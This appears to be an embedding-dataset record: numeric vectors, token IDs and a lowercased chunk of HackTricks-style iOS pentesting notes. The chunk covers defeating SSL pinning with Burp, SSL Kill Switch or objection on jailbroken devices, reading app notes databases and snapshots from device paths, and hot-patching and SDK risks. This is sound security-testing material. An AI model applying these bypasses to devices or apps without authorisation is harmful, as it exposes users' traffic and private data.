-0.31590571999549866, 0.19395530223846436, -0.32971981167793274, 0.7287434339523315, -0.11814699321985245, 0.3756212890148163, -0.08953768759965897, -0.694456934928894, -0.027615677565336227, -0.4001588821411133, 0.16429859399795532, 0.4055580496788025, -0.3386857509613037, 0.10196033865213394, -0.6888447403907776, 0.6933866739273071, 0.12660139799118042, 0.3215133547782898, -0.7659935355186462, -0.2737826406955719, 0.3421258330345154, -0.34472185373306274, 0.14690695703029633, 0.46426108479499817, -0.29951754212379456, 0.01823485642671585, -0.13052554428577423, 0.24832367897033691, -1.1553120613098145, -0.5594229102134705, -0.23065316677093506, -0.17986956238746643, 0.0094833979383111, -0.5653780698776245, 0.9983028173446655, -0.5077808499336243, -0.540152907371521, -0.00733270263299346, 0.029800472781062126, -0.2554219365119934, -0.5050792694091797, -0.5180841088294983, -0.6107074022293091, 0.6698523163795471, -0.09181931614875793, 0.12178116291761398, -0.533670961856842, 0.22485990822315216, -0.459300696849823, 0.18015266954898834, 0.35897573828697205, -0.2948509156703949, -0.5041204690933228, 0.34504956007003784, 0.18447932600975037, -0.09809339791536331, -0.3230924904346466, 0.05934784561395645, -0.6879428625106812, -0.05517495051026344, -0.2319975644350052, -0.5173909068107605, -0.7764382362365723, -0.3617889881134033, 0.020211605355143547, -0.4593384265899658, -0.03726979345083237, -0.5694258213043213, -0.07020431756973267, -0.1475358009338379, 0.19753192365169525, 0.1562025547027588, -0.9350244402885437, -0.33323150873184204, -0.3323734402656555, -0.08380774408578873, -0.39015039801597595, -0.10510291904211044, -0.3072815239429474, -0.8300633430480957, 0.3288296163082123, 0.393420934677124, 0.6942622065544128, -0.4127342700958252, -0.5695483684539795, -0.3507120609283447, 0.7137274742126465, -0.20062309503555298, -0.40333127975463867, -0.7555561065673828, 0.09339608997106552, 0.3026217222213745, -0.40170818567276, 0.6473521590232849, -0.8242868185043335, 0.1830397993326187, 0.1747206747531891, 0.5627827048301697, -0.5192148089408875, -0.3800645172595978, -0.08380434662103653, 0.23884525895118713, 0.4884832799434662, -0.740825355052948, -0.35714036226272583, -0.32422521710395813, 0.632292628288269, -0.09821325540542603, -0.4397912919521332, -0.6908535957336426, 0.17828162014484406, -1.212127447128296, -1.0035128593444824, 0.639720618724823, 0.0724722221493721, 0.09704688936471939, -0.6271615624427795, -0.5081434845924377, 0.4037231504917145, 0.19051305949687958, 0.25350213050842285, 1.1337708234786987, 0.23473109304904938, 0.35993704199790955, -0.980928361415863, 0.7232890725135803, 0.5385382771492004, -0.21799221634864807, 0.11097026616334915, -0.6332703232765198, 0.20601601898670197, -0.020909203216433525, -0.1447022259235382, 0.05901017785072327, -0.7116637825965881, -0.017651095986366272, -0.11715137958526611, -0.2720071077346802, 0.6030091643333435, -0.4030137062072754, -0.8265883922576904, -0.24622958898544312, -0.0964006707072258, 0.01693805679678917, -0.20350654423236847, 0.20928557217121124, 0.695502758026123, 0.18461422622203827, -0.4252171218395233, -0.0716746598482132, 0.11289814114570618, 0.2534005045890808, 0.2715196907520294, 0.1905297487974167, -1.1170011758804321, 1.0148521661758423, 0.5803471207618713, -0.6902883052825928, -0.4182896018028259, -0.46153780817985535, -0.42008811235427856, 0.44855135679244995, -0.4246605634689331, -0.4522356688976288, 0.7909887433052063, -0.07708684355020523, -0.10385100543498993, 0.8080714344978333, 0.22634555399417877, -0.034897275269031525, -0.4677695333957672, 0.6528434753417969, -0.13558927178382874, 0.20901665091514587, 0.7053550481796265, -0.1985946148633957, -0.4029666781425476, -1.0758867263793945, -0.18573568761348724, 0.5986356139183044, -0.24423572421073914, 1.2059352397918701, -0.17185993492603302, 0.5445115566253662, 0.7247397899627686, -0.5109965205192566, 1.1129028797149658, -0.3843191862106323, 0.04007315635681152, 0.6229824423789978, 0.05902528390288353, -0.8710331916809082, -0.7947433590888977, 0.6086071133613586, -0.129245787858963, 0.588019847869873, -0.48544031381607056, 0.26471811532974243, -0.05628081411123276, 0.1101001724600792, 0.28627896308898926, -0.812320351600647, -0.782439112663269, -0.8006266355514526, -0.2638965845108032, -0.33508333563804626, 0.1454038769006729, -0.22013641893863678, 0.12649062275886536, -0.13264964520931244, 0.1294577270746231, -0.04426580294966698, 0.38985684514045715, 0.12978453934192657, 0.07101990282535553, -0.3954866826534271, 0.2933478057384491, -0.6029070019721985, -1.1907610893249512, -0.3624212443828583, -0.6080310344696045, -0.40229207277297974, -0.3967670500278473, 0.011096826754510403, 0.013793237507343292, -0.2823611795902252, 0.5713769197463989, -0.1202961653470993, 0.0562082901597023, -0.2787323296070099, -0.5254427194595337, 0.08024577051401138, 0.15047313272953033, -0.5473721623420715, 0.247391939163208, -0.3702763319015503, 0.1620514839887619, 0.07486928254365921, -0.8680644035339355, 0.5302041172981262, -0.27270421385765076, 0.45088157057762146, -0.1946776658296585, 0.5116443634033203, -0.19520005583763123, 0.03747209161520004, -1.0871641635894775, 0.2714621424674988, 0.014128124341368675, -0.8185298442840576, 0.22283518314361572, 0.6901745200157166, -0.3063284158706665, 0.2624867260456085, 0.41130900382995605, 0.26064127683639526, 0.766745388507843, -0.810666561126709, 0.5910660624504089, 0.49555540084838867, -0.2850133180618286, 0.07663822174072266, 0.41639262437820435, 0.32259809970855713, -0.1551562398672104, 0.27322518825531006, -0.21459433436393738, -0.2367236465215683, 0.24615511298179626, -0.23626244068145752, -0.04386933147907257, -0.5508013367652893, -0.6277494430541992, -0.2302176058292389, 0.008057055063545704, 0.07984442263841629, 0.12129471451044083, 0.8337152004241943, 0.23167146742343903, -0.89621901512146, 0.201893150806427, -0.9745112657546997, 0.10672594606876373, 0.3178134560585022, -0.21780867874622345, -0.44400960206985474, 0.2251124531030655, 0.024006180465221405, -0.8189091682434082, 0.8213171362876892, -0.12863658368587494, 0.2680417597293854, 0.26822003722190857, 0.3083652853965759, 1.0526920557022095, -0.2329290509223938, -0.21399344503879547, -0.26042211055755615, 0.5181914567947388, -0.3723125457763672, -0.7538954019546509, 0.305986225605011, 0.7194064855575562, 0.6881803274154663, -0.18744558095932007, -0.23459351062774658, -0.06238405033946037, 0.49760159850120544, 0.21803238987922668, 0.04366641119122505, 0.49049684405326843, -0.5555408596992493, 0.1199369728565216, -0.45481452345848083, 0.42849770188331604, 0.6419169306755066, -0.031723495572805405, -0.2531791627407074, 0.05218726769089699, -0.168257936835289, 0.025369616225361824, -0.07705435156822205, -0.5167403221130371, 0.9353528022766113, 0.20866844058036804, 0.6710371971130371, -0.21100884675979614, 0.2662791311740875, -0.4480283856391907, 0.6860854029655457, 0.7038304209709167, 0.4102416932582855, 0.10929587483406067, 0.18693891167640686, 0.20120730996131897, -0.908666729927063, -0.25090572237968445, 0.49946311116218567, 0.3256678879261017, -0.2963722050189972, -0.02431977167725563, -0.6776471138000488, 0.2592865228652954, -0.046448349952697754, -0.15798340737819672, -0.11077091097831726, -0.1592298150062561, 0.500624418258667, -0.16068169474601746, -0.26662760972976685, 0.854995846748352, -0.35565057396888733, 0.5395424365997314, -0.08858475089073181, -0.3061051666736603, 0.1859724074602127, 0.1882123500108719, -0.3962118327617645, 0.6193165183067322, 0.9615994691848755, 0.014455899596214294, -0.38912224769592285, 0.5044862627983093, -0.22498422861099243, -0.20496731996536255, 0.36597639322280884, -0.23052427172660828, -0.7279842495918274, 0.2985042929649353, 0.2950771152973175, -0.5602246522903442, -0.6657252907752991, 0.5275925397872925, 0.09344248473644257, -0.3074563145637512, 0.43187716603279114, -0.5800585746765137, 0.08289443701505661, 0.018417509272694588, 0.9567764401435852, -0.0029738363809883595, -0.2699945569038391, 0.30577751994132996, -0.8106250762939453, -0.7751767039299011, 0.9370070695877075, 0.34948134422302246, 0.33972904086112976, 0.07217647135257721, 0.7490997910499573, 0.25718632340431213, 0.7068966627120972, -0.3940695822238922, -0.5311740636825562, -0.6319977641105652, -0.004916212987154722, -0.28778979182243347, -0.13501745462417603, -0.10947049409151077, -0.38300952315330505, 0.833949089050293, -0.2927272319793701, -0.4230828881263733, 0.014083023183047771, -0.39168551564216614, -0.30016636848449707, -0.15194515883922577, 0.6385406851768494, 0.19185347855091095, -0.24330095946788788, 0.5244792699813843, 0.23815935850143433, -0.18463988602161407, 0.14540475606918335, -0.5813376903533936, 0.002203695708885789, -0.2805277109146118, -0.3894971013069153, -0.715697169303894, 0.669800877571106, 0.204522043466568, -0.0882938802242279, 0.3316703140735626, -0.43381059169769287, -0.5661581158638, 0.38382649421691895, -0.3591828942298889, -0.3372569680213928, 0.5834879875183105, -0.03571392595767975, 0.9012295007705688, -0.05626020208001137, 0.2103797197341919, 0.16714730858802795, 0.8514419198036194, 0.9307680726051331, -0.4995846748352051, 0.8552454113960266, 0.2328900247812271, 0.12136024236679077, 0.39957180619239807, -0.573078989982605, 0.5560525059700012, -0.3976358473300934, 0.10947180539369583, -0.8122097253799438, -0.1794242262840271, -0.7303810119628906, -0.32026225328445435, -0.27872779965400696, -0.39461761713027954, -0.13342244923114777, -0.23838834464550018, -1.2591302394866943, -0.06428638100624084, -0.48007631301879883, -0.044376272708177567, 0.09884212911128998, -0.07371552288532257, 0.013980257324874401, -0.007761865854263306, 0.7770268321037292, -1.2858011722564697, 4.446957588195801, 0.5255571007728577, 0.16959309577941895, 0.2863530218601227, 0.6818779706954956, 1.0287103652954102, 0.8599158525466919, -0.5759985446929932, -0.14885213971138, 0.10507907718420029, 0.0927884429693222, -0.23015239834785461, 0.8901925683021545, 0.5317028760910034, -0.12988252937793732, 0.2993967831134796, -0.3862243890762329, -0.2729058563709259, 0.5803234577178955, -0.7314348220825195, -0.49211522936820984, 0.2997247278690338, 0.07640698552131653, 0.564567506313324, 0.5460337996482849, 0.5300503969192505, -0.12581095099449158, -0.33526602387428284, 0.15306831896305084, 0.0769961029291153, 0.16677746176719666, 0.017921103164553642, -0.016017623245716095, -0.7789081931114197, -0.5123224258422852, 0.2439112812280655, 0.2809404730796814, -0.5339862704277039, -0.3072245419025421, 0.11161834746599197, 0.4518515467643738, 0.28842324018478394, 0.41522011160850525, -0.2081035077571869, 0.15037043392658234, 0.44949018955230713, -0.4540228247642517, 0.559105634689331, 0.6754114627838135, -0.42435455322265625, 0.881300151348114, -0.49171191453933716, 0.7513086199760437, -0.01578192412853241, 0.054398611187934875, 0.4758354127407074, 0.13037477433681488, -0.5185735821723938, -0.06533683091402054, 0.34078869223594666, 0.3384953439235687, -1.0617700815200806, -0.1426461935043335, -0.3389812111854553, -1.044156789779663, 0.5020976066589355, -0.184815913438797, 0.4850471019744873, -0.65144944190979, -0.11784107238054276, -0.26123514771461487, -0.03480047360062599, -0.955003023147583, -0.5139282941818237, 0.4560517370700836, -0.09483347088098526, -0.3440125286579132, 0.6473487615585327, -0.0925702154636383, 0.0791190043091774, -0.1946897953748703, -0.4786621928215027, -0.7503806948661804, 0.3846262991428375, 0.5952652096748352, 0.49079015851020813, 0.07608679682016373, -0.6517838835716248, -0.03817468136548996, 0.17985931038856506, 0.5690632462501526, -0.3614341914653778, -0.08146878331899643, 0.03897615149617195, 0.29016029834747314 ]
[ 1010, 1034, 1063, 1031, 3543, 8524, 14317, 4765, 21261, 2265, 9453, 5339, 1024, 1030, 1000, 2115, 5080, 2987, 1005, 1056, 2490, 3543, 8909, 2030, 2017, 4033, 1005, 1056, 26928, 3543, 8909, 27280, 2006, 2115, 5080, 1000, 2007, 3775, 9286, 1024, 1030, 1000, 7561, 1000, 1033, 1025, 1065, 1007, 1025, 1065, 1065, 2000, 11826, 1996, 2334, 27280, 1010, 2057, 2031, 2000, 4339, 1037, 10424, 8524, 5896, 2008, 11826, 2229, 1996, 17289, 16157, 18155, 2594, 2100, 1035, 4638, 1012, 2004, 2017, 2064, 2156, 1999, 1996, 2682, 1011, 19351, 2094, 3642, 1055, 3490, 29519, 1010, 1996, 16157, 18155, 2594, 2100, 3594, 1037, 2655, 5963, 2008, 16463, 1996, 2765, 1012, 2061, 1010, 1996, 25551, 2126, 2000, 6162, 1996, 20578, 2003, 2000, 19115, 2008, 2655, 5963, 1998, 2191, 2469, 2009, 2467, 5651, 1996, 3112, 1027, 1015, 1012, 1013, 1013, 2013, 24471, 2140, 1063, 10122, 1012, 8833, 1006, 1000, 1999, 20614, 2075, 1012, 1012, 1012, 1000, 1007, 1025, 13075, 8103, 1027, 27885, 3501, 2278, 1012, 4280, 1012, 18749, 28040, 18413, 1031, 1000, 1011, 16157, 18155, 2594, 2100, 1024, 22574, 16416, 3385, 1024, 7514, 1024, 1000, 1033, 1025, 24727, 1012, 22476, 1006, 8103, 1012, 7375, 1010, 1063, 2028, 10111, 2099, 1024, 3853, 1006, 12098, 5620, 1007, 1063, 13075, 3796, 1027, 2047, 27885, 3501, 2278, 1012, 3796, 1006, 12098, 5620, 1031, 1018, 1033, 1007, 1025, 9530, 3367, 2655, 5963, 1027, 3796, 1012, 7375, 1025, 3796, 1012, 7375, 1027, 3853, 1006, 7561, 1010, 3643, 1007, 1063, 10122, 1012, 8833, 1006, 1000, 5278, 1996, 2765, 3643, 2000, 2995, 1000, 1007, 9530, 3367, 2765, 1027, 2655, 5963, 1006, 1015, 1010, 19701, 1007, 1025, 2709, 2765, 1025, 1065, 1025, 1065, 1010, 1065, 1007, 1025, 1065, 2842, 1063, 10122, 1012, 8833, 1006, 1000, 7863, 1011, 1039, 2448, 7292, 2003, 2025, 2800, 999, 1000, 1007, 1025, 1065, 10424, 8524, 1011, 1057, 1011, 1042, 4012, 1012, 2152, 2389, 3775, 8525, 25383, 8684, 2015, 1012, 1040, 9035, 26760, 10128, 9189, 2475, 1011, 1011, 2053, 1011, 8724, 1011, 1048, 4344, 16550, 1011, 11826, 1011, 16380, 1012, 1046, 14416, 28032, 3512, 15380, 7524, 2083, 12997, 27631, 20389, 24471, 2072, 28213, 2015, 1013, 2784, 13767, 2015, 1013, 7661, 11683, 10735, 7661, 24471, 2072, 28213, 2015, 1013, 2784, 13767, 2015, 1013, 7661, 11683, 19496, 14028, 2389, 6971, 10735, 5415, 6971, 10179, 18908, 7730, 6631, 10735, 21318, 18908, 7730, 6631, 10179, 19707, 2618, 6277, 10735, 21318, 19707, 2618, 6277, 29098, 14305, 10735, 10439, 14305, 8545, 2497, 8584, 20763, 2015, 4773, 8584, 18116, 4818, 6648, 1998, 17181, 10735, 7642, 6648, 1998, 17181, 7159, 6198, 4807, 4183, 1005, 1055, 2590, 2000, 4638, 2008, 2053, 4807, 2003, 10066, 2302, 21999, 1998, 2036, 2008, 1996, 4646, 2003, 11178, 9398, 5844, 1996, 1056, 4877, 8196, 1997, 1996, 8241, 1012, 2000, 4638, 2122, 2785, 1997, 3314, 2017, 2064, 2224, 1037, 24540, 2066, 20934, 14536, 1024, 16380, 20934, 14536, 7621, 9563, 15006, 2102, 18442, 4638, 5643, 2691, 3277, 9398, 5844, 1996, 1056, 4877, 8196, 2003, 2000, 4638, 2008, 1996, 8196, 2001, 2772, 2011, 1037, 9480, 6187, 1010, 2021, 2025, 4638, 2065, 1996, 3677, 18442, 1997, 1996, 8196, 2003, 1996, 3677, 18442, 2108, 11570, 1012, 1999, 2344, 2000, 4638, 2023, 3277 ]
hack_tricks
43.txt
25
using burp, after trusting burp ca in the iphone, you can create a new certificate with burp for a different hostname and use it. if the application still works, then, something it's vulnerable. certificate pinningif an application is correctly using ssl pinning, then the application will only works if the certificate is the once expected to be. when testing an application this might be a problem as burp will serve it's own certificate. in order to bypass this protection inside a jailbroken device, you can install the application ssl kill switch or install burp mobile assistantyou can also use objection's ios sslpinning disablemiscin / system / library you can find the frameworks installed in the phone used by system applicationsthe applications installed by the user from the app store are located inside / user / applicationsand the / user / library contains data saved by the user level applicationsyou can access / user / library / notes / notes. sqlite to read the notes saved inside the application. inside the folder of an installed application ( / user / applications / < app id > / ) you can find some interesting files : itunesartwork : the icon used by the appitunesmetadata. plist : info of the app used in the app store / library / * : contains the preferences and cache. in / library / cache / snapshots / * you can find the snapshot performed to the application before sending it to the background. hot patching / enforced updateingthe developers can remotely patch all installations of their app instantly without having to resubmit the application to the app store and wait until it's approved. for this purpose it's usually use jspatch. but there are other options also such as siren and react - native - appstore - version - checker. this is a dangerous mechanism that could be abused by malicious third party sdks therefore it's recommended to check which method is used to automatic updating ( if any ) and test it. you could try to download a previous version of the app for this purpose. third partiesone problem of 3rd party sdks is that there is no granular control over the features offered by the sdk. you could sue the sdk and have all features ( including diagnostic leaks and insecure http connections ), or not use it. also, usually it's no possible for the applications developers to patch a vulnerability on the sdk. moreover some sdks start containing malware once they are very
[ 0.1362496018409729, -0.14555023610591888, -0.0067179081961512566, 0.5045421123504639, -0.16611304879188538, -0.4734947979450226, -0.07789728790521622, 0.29809606075286865, 0.5890073776245117, 1.1355154514312744, 0.27380838990211487, -0.18007101118564606, 0.5728378295898438, -0.213408961892128, -0.7458082437515259, -0.581912100315094, -0.23392555117607117, -0.25506243109703064, -0.7100876569747925, -0.11569228023290634, 0.4512253999710083, 0.011243435554206371, -0.4585377871990204, -0.27663660049438477, -0.5329560041427612, 0.7660241723060608, 0.3472703993320465, 0.46552959084510803, 0.4430686831474304, 0.900877058506012, 0.013222211971879005, 0.08942075818777084, 0.11340687423944473, -0.47398293018341064, 0.15317514538764954, -0.46859514713287354, 0.5103240609169006, -0.11886218935251236, 0.03176909685134888, -0.7418431639671326, 0.4281122386455536, -0.15232007205486298, 0.3407798111438751, -0.12093101441860199, -0.4369906485080719, -0.36806726455688477, 0.11769288778305054, -0.10763461887836456, 0.4226895868778229, 0.7143272161483765, 0.1574418544769287, 0.5758118033409119, -0.035752229392528534, 0.001752514042891562, 0.4836147129535675, 0.08441910892724991, 0.020281992852687836, 0.21347805857658386, -0.07965770363807678, -0.343225359916687, -0.09301792830228806, 0.5770072937011719, 0.21458850800991058, -0.9593469500541687, 0.3096858561038971, 1.0019218921661377, 0.008954000659286976, -0.14413027465343475, -0.2183111310005188, -0.44553980231285095, -0.6151251792907715, 0.5655597448348999, -0.49873653054237366, -1.070019006729126, -0.7376482486724854, 0.05938493460416794, 0.3571360409259796, -0.7054513692855835, 0.002744567347690463, 0.5428654551506042, 0.1921183466911316, 0.6989990472793579, 0.6072247624397278, -0.25875717401504517, -0.445505291223526, 0.06664171814918518, 0.9271960258483887, 0.7352097034454346, -0.30173465609550476, 0.2432916760444641, 0.43016013503074646, 0.12241194397211075, -0.8311325907707214, -0.1662701517343521, 0.29435938596725464, 0.7814933657646179, -0.7135054469108582, -0.3438638746738434, 0.013986091129481792, 0.1278124302625656, 0.6905730962753296, 0.01381741277873516, 0.12628869712352753, 0.5186256766319275, -0.5641247034072876, 0.9989275932312012, 0.33175182342529297, -0.2650255262851715, -0.40109285712242126, -0.25071659684181213, 0.2586911916732788, 0.030055826529860497, -0.21081699430942535, -0.735327959060669, -0.09118087589740753, -0.28805631399154663, 0.6228246092796326, 0.4964948296546936, -0.5956555604934692, 0.7686575055122375, 0.5778200030326843, 0.03007183037698269, 0.2927815914154053, -0.6507337689399719, -0.2860398590564728, 0.33812856674194336, 0.5775145888328552, 0.5616073608398438, -0.3216358423233032, -0.21014098823070526, -0.2359696328639984, -0.25345098972320557, 0.003742278553545475, 0.5154845714569092, -0.34087905287742615, -0.1882617175579071, 0.39658504724502563, 0.2134234756231308, 0.7906442880630493, -0.9106341600418091, -0.1540648490190506, 0.6750601530075073, -0.44900012016296387, 1.081238031387329, 0.08231012523174286, -0.019722891971468925, -0.02717457339167595, -0.25995510816574097, -0.014549408107995987, 0.5912699103355408, -0.005700485780835152, 0.3221921920776367, 0.8232468962669373, -0.022024031728506088, -0.33474984765052795, 0.5600511431694031, -0.5603103041648865, 0.5642273426055908, -0.14320823550224304, -0.15325896441936493, -0.13005638122558594, 0.6989562511444092, -0.1923321932554245, 0.7896080017089844, -0.2765175998210907, 0.22307421267032623, -0.610227644443512, -0.7497228384017944, 0.18434467911720276, 0.26110151410102844, -0.09051322937011719, 0.014012058265507221, 0.023328173905611038, 0.4059833288192749, 0.8082208633422852, 0.9575662612915039, -0.018104977905750275, -0.31426340341567993, 0.38778313994407654, 0.4121757745742798, -0.384230375289917, 0.26161283254623413, 0.5025496482849121, 0.7023309469223022, 0.24355073273181915, 0.34707850217819214, -0.2247360795736313, -0.9702627062797546, 0.026174359023571014, -0.1734493523836136, -0.6288512945175171, 0.27937397360801697, -0.4642287492752075, 0.9884209632873535, 0.26756423711776733, -0.27362674474716187, -1.3915438652038574, -0.27100253105163574, 0.19778288900852203, -1.2205456495285034, -0.36767578125, 0.08509400486946106, 0.038074832409620285, 0.6704889535903931, -0.2796412408351898, -0.36356326937675476, 0.6002619862556458, 0.2882996201515198, 0.004680251237004995, 0.43170681595802307, 0.9268696904182434, -0.25660839676856995, -0.9044070243835449, -0.5575788617134094, 0.2297361195087433, -0.1797998696565628, 0.30598869919776917, 0.19392059743404388, -0.2077806144952774, -0.13438038527965546, -0.4673161506652832, 0.32871347665786743, 0.737449049949646, 0.14649517834186554, -0.6044319868087769, -0.20572519302368164, 0.147140234708786, -0.1006062850356102, -1.0014491081237793, -0.12702511250972748, -0.4687967598438263, 0.3738058805465698, 0.35331541299819946, 0.6647570729255676, 0.04349549487233162, -0.038263529539108276, 0.140409454703331, -0.06354808062314987, 0.2842024266719818, 0.009263135492801666, 0.02535523660480976, 1.019038200378418, -0.026815375313162804, 0.3564813435077667, 0.4133819043636322, -0.24063046276569366, 0.0017486774595454335, 0.31803783774375916, 0.1383541375398636, 0.5446048974990845, -0.424264520406723, 0.5876336693763733, 0.5148061513900757, 0.4341096580028534, -0.6976101994514465, -0.5843504667282104, 0.5288105607032776, 0.6006293892860413, -0.8272339105606079, -0.3052610456943512, 0.3461800515651703, -0.23619212210178375, -0.2554306983947754, 0.16209138929843903, 0.13504759967327118, 0.16359566152095795, -0.1516720950603485, 0.3984651267528534, -0.40568581223487854, -0.42791080474853516, -0.5292900204658508, -0.2532612979412079, -0.8909496068954468, -0.4659944176673889, -0.62641441822052, -0.21736383438110352, -0.30375930666923523, -0.4779120683670044, 0.5295940637588501, -0.7191502451896667, -0.528363823890686, 0.2640168368816376, 0.4402155876159668, -0.07847746461629868, -0.28433018922805786, 0.0729556679725647, -1.0872756242752075, 0.3935728073120117, -0.061428435146808624, 0.4091574251651764, -0.2770727872848511, 0.017739716917276382, -0.04909608140587807, -0.1863049864768982, -0.11366305500268936, -0.12745514512062073, 0.8930273652076721, 0.6777502298355103, -0.44978630542755127, -0.00797230564057827, 0.7317598462104797, -0.07248468697071075, 0.3878518044948578, 0.08711057156324387, -0.3767528235912323, 0.4711013734340668, -0.5816221237182617, -0.17092175781726837, 0.3265421986579895, 0.15834693610668182, -0.7057331800460815, 0.06346429884433746, -0.2819271683692932, 0.5033970475196838, -0.5541678071022034, -0.13007932901382446, 0.16687791049480438, 0.20783443748950958, -0.3694770634174347, -0.4872327148914337, 0.1989406943321228, -0.6584842801094055, -0.2465450018644333, 0.1308014988899231, 0.00615379773080349, 0.3869498372077942, -0.04559140279889107, -0.9359138011932373, 0.7445100545883179, -0.16276389360427856, -0.39431387186050415, -0.4753892123699188, -0.2715771496295929, 0.9581362009048462, 0.6380639672279358, -0.029731661081314087, 0.33149081468582153, -0.1785629242658615, -0.13014493882656097, 0.3611338138580322, -0.03446923941373825, -0.30636322498321533, 0.5172260999679565, 0.395368754863739, -0.45986077189445496, 0.6079249978065491, 0.14659865200519562, -0.3877553939819336, 0.06220770999789238, -0.2224433571100235, -0.6902249455451965, 0.05941620469093323, 0.07509152591228485, 0.4945388734340668, 0.4130290150642395, 0.7606239318847656, -0.5143952369689941, -0.17877653241157532, 0.5076517462730408, 0.2285924106836319, -0.018855683505535126, 0.07038205862045288, -0.11765380203723907, 0.11955735832452774, -0.20834103226661682, -0.36373192071914673, -0.1667223572731018, 0.5225143432617188, 0.3500593602657318, -0.31755509972572327, 0.1387416422367096, -0.28904181718826294, -0.7188061475753784, 0.4506976008415222, -0.44859808683395386, -0.47043365240097046, 0.45402371883392334, 0.4729897975921631, 0.6258694529533386, -0.2517140209674835, -0.0224916934967041, -0.401078462600708, 0.14367389678955078, 0.4818499982357025, 0.22363927960395813, -0.38623344898223877, -0.5345529317855835, -0.5206554532051086, -0.011731727980077267, -0.10290386527776718, -0.24665643274784088, 0.10089954733848572, 0.32273069024086, -0.40311717987060547, -0.23517534136772156, -1.0253323316574097, 0.1290002465248108, 0.7864208817481995, 0.5131902098655701, 0.7764861583709717, 0.8535354137420654, 0.11793727427721024, -0.22532756626605988, 0.14320425689220428, -0.44094395637512207, 0.4342784285545349, -0.4490587115287781, 0.9626570343971252, -0.6053658723831177, 0.21451425552368164, -0.10751985758543015, -0.06526698917150497, -0.19959288835525513, -0.02587350457906723, -0.25023216009140015, -0.02737690880894661, -0.49531134963035583, -0.6724376082420349, -0.6530943512916565, 0.07796835154294968, -0.9624696373939514, -0.6786425113677979, -0.35086241364479065, 0.3105068802833557, 0.6570175290107727, -1.169410228729248, 0.01540550496429205, -0.439101904630661, 0.24354758858680725, 0.3367104232311249, -0.10997752100229263, -0.004164842423051596, -0.33627521991729736, -0.4276348948478699, -0.6966002583503723, -0.290503591299057, 0.6814663410186768, 0.663598895072937, 0.47355177998542786, -0.896117627620697, -0.19251976907253265, 0.8950582146644592, -0.5417609810829163, -0.8280516266822815, -0.29014307260513306, 0.46622103452682495, 0.4635013937950134, 0.608552873134613, -0.03825296089053154, -0.43825703859329224, -0.08315762132406235, -0.8242661356925964, 0.5884518027305603, -0.5701666474342346, -0.1359778791666031, -0.03661064803600311, 0.7744384407997131, 0.4345928728580475, 0.3395844101905823, -0.25137534737586975, 0.21826055645942688, -0.49177441000938416, -0.0957779809832573, -0.499654084444046, -0.08692795783281326, 0.3529385030269623, -0.2403448075056076, 0.022779058665037155, 0.1970265954732895, 0.3754362165927887, -0.05872863903641701, 0.7647896409034729, -0.5449028611183167, -0.567966878414154, 0.490653932094574, -0.4854784607887268, 0.34694910049438477, 0.48031333088874817, -0.39088305830955505, -0.6220748424530029, -0.11202027648687363, 1.2317090034484863, 0.2053808718919754, 0.5394335985183716, -0.8609930276870728, -0.28513601422309875, 0.2738247513771057, 0.3398182690143585, -0.2267485409975052, 0.9924958348274231, -0.162557914853096, -0.12207499891519547, -0.21130183339118958, 0.30842360854148865, -0.54604572057724, -0.2501440644264221, -0.32797253131866455, 0.20711560547351837, -0.19098299741744995, -0.007482747081667185, 0.8136093020439148, 0.7058820128440857, -0.3624905049800873, 0.3153601884841919, -0.3319209814071655, -0.26817795634269714, -1.1526200771331787, -0.14263468980789185, -0.5842068791389465, 0.6170945167541504, -0.3643230199813843, 0.575264573097229, -0.44514763355255127, -0.06208664923906326, 0.5646584630012512, -0.07889265567064285, 0.41693851351737976, 0.1539296656847, -0.6680610775947571, 0.35393011569976807, 0.5278608798980713, 0.25267714262008667, 0.19788438081741333, 0.20196950435638428, -0.25147730112075806, 0.10660343617200851, -1.0403507947921753, 0.08904367685317993, -0.4772823750972748, -0.962806224822998, 0.5593539476394653, -0.5501976013183594, 0.4677942395210266, -0.5632299780845642, -0.9261833429336548, -0.3018498718738556, 0.7995374202728271, -0.007802726235240698, -0.7664626240730286, 0.2854267954826355, -0.4503738284111023, 0.28758642077445984, -0.4656638205051422, -0.14335402846336365, -0.5268136858940125, -0.27970296144485474, 0.0877276137471199, 0.7135783433914185, -0.13308101892471313, -0.13062110543251038, -0.01424478366971016, 0.426379531621933, 0.2059142142534256, -0.02822432480752468, -0.525113582611084, -0.34767019748687744, -0.15369050204753876, 0.32906949520111084, -0.09709296375513077, 0.6794225573539734, -0.5421234965324402, 0.5446832180023193, 0.11612789332866669, 0.4375794529914856, 0.020021457225084305, 0.20196139812469482, -0.29063722491264343, -0.013700202107429504, 0.8205808997154236, -0.6720382571220398, 0.26088833808898926, -0.3872723877429962, 0.9266624450683594, 0.38800787925720215, 0.056906379759311676, -0.8114339709281921, 0.7538564801216125, -0.8485633730888367, -1.2325036525726318, 0.4276498854160309, 0.010264411568641663, 0.36125922203063965, 0.3301765024662018, -0.6206190586090088, 0.07004251331090927, -0.03736910969018936, 0.13704097270965576, 0.8489423990249634, 0.0778491422533989, 0.3361266553401947, -1.0612683296203613, 1.0452333688735962, 0.35735079646110535, 0.011126586236059666, -0.0015330127207562327, -0.2667899429798126, 0.28260669112205505, -0.39564549922943115, -0.21424399316310883, -0.3876782953739166, -0.608653724193573, -0.06280045956373215, 0.6369931101799011, -0.2918216288089752, 0.30774492025375366, -0.00377826439216733, -0.7108041644096375, 0.2087433934211731, 0.14989757537841797, 0.2222900539636612, -0.507222056388855, 0.6128961443901062, 0.6368836760520935, -0.09627820551395416, -0.3686876595020294, -0.5845474600791931, 0.23236022889614105, 0.1573326140642166, 0.2802302837371826, 0.3605955243110657, -0.44415777921676636, 1.0678563117980957, 0.5350866317749023, -1.1081469058990479, -0.4673669636249542, -0.4854332506656647, -0.04909604787826538, 0.5614893436431885, 0.11895395815372467, -0.24023762345314026, -0.20405113697052002, -0.410454660654068, -0.12231112271547318, 0.1745293140411377, -0.3525039851665497, 0.349263995885849, -0.7618480324745178, 0.521329402923584, 0.05051504820585251, -0.14852358400821686, 0.6578764915466309, -0.6945702433586121, -1.0915910005569458, -0.5471686124801636, 0.19431322813034058, -0.3103930354118347, 0.061673007905483246, 1.5310075283050537, -0.19094592332839966, 0.20486022531986237, -0.16003398597240448, -0.0765923485159874, 0.43368884921073914, 0.32467812299728394, 0.24063220620155334, 0.3548412621021271, -0.32606834173202515, -0.7669673562049866, -0.03323422744870186, -0.12215972691774368, -0.0017390708671882749, 0.3390912115573883, -0.3250178396701813, -0.09769434481859207, -0.48097413778305054, 0.3766193389892578, 0.20425331592559814, -0.33155956864356995, -0.8508152961730957, -0.6732169389724731, 0.0007868061074987054, -0.04516151174902916, -0.36375516653060913, -0.022434858605265617, 